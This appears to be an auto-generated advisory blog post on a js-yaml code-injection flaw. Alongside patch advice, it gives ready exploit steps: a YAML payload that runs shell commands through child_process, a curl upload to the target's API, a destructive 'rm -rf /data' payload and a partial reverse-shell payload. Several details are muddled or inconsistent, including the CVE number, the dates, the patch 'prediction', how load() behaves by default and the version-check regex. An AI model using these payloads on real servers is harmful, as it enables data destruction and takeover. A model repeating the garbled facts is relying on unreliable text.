Listen to this Post
The CVE-2020-8131 vulnerability exists in the js-yaml library when the `load()` function parses YAML without a safe schema. By default, js-yaml supports custom tags like `!!js/function` and !!js/undefined, which allow embedding and evaluating JavaScript code. The vulnerable `AgentService.loadAgentFromFile` method at `src/agents/agent.service.ts:55` calls `yaml.load(fileContent)` without specifying `JSON_SCHEMA` or DEFAULT_SAFE_SCHEMA. An attacker crafts a YAML file containing !!js/function > function(){ require('child_process').execSync('touch /tmp/pwned') }. This file is uploaded via an API endpoint that triggers the load. When parsed, the `!!js/function` tag instantiates a JavaScript function, and the library’s internal mechanism executes that function immediately because the `load` function evaluates code for such tags. The `require(‘child_process’).execSync` runs the shell command touch /tmp/pwned, creating a file as proof. The attack does not need any additional deserialization gadgets – the tag itself is the payload. The root cause is that `js-yaml` versions before 3.13.1 allowed this dangerous behavior. The fix replaces `load` with load(schema: JSON_SCHEMA), which disables all JavaScript-specific tags. The vulnerability leads to unauthenticated remote code execution if the API endpoint lacks access controls. Exploitation requires only the ability to upload a YAML file and have the server parse it via the vulnerable method.
dailycve form:
Platform: Node.js server
Version: js-yaml <3.13.1
Vulnerability: YAML code injection
Severity: Critical
date: 2020-06-10
Prediction: Patch 2020-06-15
What Undercode Say:
Check js-yaml version
npm list js-yaml
Vulnerable version range
if [ "$(npm list js-yaml | grep -E 'js-yaml@[0-2].|3.[0-9].|3.1[0-2].')" ]; then echo "VULNERABLE"; fi
Test payload creation
echo '!!js/function > function(){ require("child_process").execSync("touch /tmp/pwned") }' > malicious.yaml
Simulate upload (curl example)
curl -X POST http://target/api/agents -F "[email protected]"
Exploit:
- Create `evil.yaml` with: `!!js/function > function(){ require(‘child_process’).execSync(‘rm -rf /data’) }`
2. Send POST request to `/api/agents/upload` with multipart file. - Server calls `loadAgentFromFile` → YAML parsed → function executes → system command runs.
- Reverse shell payload: `!!js/function > function(){ var net=require(‘net’); var sh=require(‘child_process’).exec(‘/bin/sh’); … }`
Protection from this CVE
- Upgrade js-yaml to ≥3.13.1 or ≥4.0.0.
- Replace `yaml.load(data)` with
yaml.load(data, { schema: yaml.JSON_SCHEMA }). - Use `yaml.safeLoad()` if using older API (deprecated but safe).
- Validate uploaded files: reject YAML containing `!!js/` or `!!python/` tags.
- Run API endpoint with authentication and least privilege.
Impact
- Unauthenticated remote code execution → full server compromise.
- Attacker can read, modify, delete files; install backdoors; pivot to internal network.
- Data theft, credential harvesting, denial of service via resource exhaustion.
- Complete loss of confidentiality, integrity, availability.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

